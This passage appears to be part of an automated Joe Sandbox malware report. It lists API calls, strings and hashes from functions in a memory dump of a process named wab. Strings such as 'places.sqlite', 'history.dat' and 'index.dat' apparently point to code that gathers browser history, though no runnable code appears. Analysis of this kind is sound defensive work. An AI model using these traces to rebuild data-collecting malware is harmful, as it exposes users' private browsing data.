                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                            • String ID:
                                            • API String ID: 2947809556-0
                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                            APIs
                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                            • memset.MSVCRT ref: 00403A55
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                            • String ID: history.dat$places.sqlite
                                            • API String ID: 3093078384-467022611
                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                            APIs
                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                            • GetLastError.KERNEL32 ref: 00417627
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ErrorLast$File$PointerRead
                                            • String ID:
                                            • API String ID: 839530781-0
                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID: *.*$index.dat
                                            • API String ID: 1974802433-2863569691
                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@mallocmemcpy
                                            • String ID:
                                            • API String ID: 3831604043-0
                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                            • GetLastError.KERNEL32 ref: 004175A2
                                            • GetLastError.KERNEL32 ref: 004175A8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FilePointer
                                            • String ID:
                                            • API String ID: 1156039329-0
                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$ChangeCloseCreateFindNotificationTime
                                            • String ID:
                                            • API String ID: 1631957507-0
                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Temp$DirectoryFileNamePathWindows
                                            • String ID:
                                            • API String ID: 1125800050-0
                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d
                                            • API String ID: 0-2564639436
                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: BINARY
                                            • API String ID: 2221118986-907554435
                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                            APIs
                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                            • String ID:
                                            • API String ID: 1161345128-0
                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: /stext
                                            • API String ID: 2081463915-3817206916
                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: .#v
                                            • API String ID: 2081463915-507759092
                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                            • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                            • String ID:
                                            • API String ID: 159017214-0
                                            • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                            • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                            APIs
                                            Strings
                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: malloc
                                            • String ID: failed to allocate %u bytes of memory
                                            • API String ID: 2803490479-1168259600
                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcmpmemset
                                            • String ID:
                                            • API String ID: 1065087418-0
                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                            • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                            • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                            • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                            APIs
                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                              • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                            • String ID:
                                            • API String ID: 1481295809-0
                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                            APIs
                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 3150196962-0
                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$PointerRead
                                            • String ID:
                                            • API String ID: 3154509469-0
                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                            APIs
                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                            • String ID:
                                            • API String ID: 4232544981-0
                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                            APIs
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$FileModuleName
                                            • String ID:
                                            • API String ID: 3859505661-0
                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                            APIs
                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
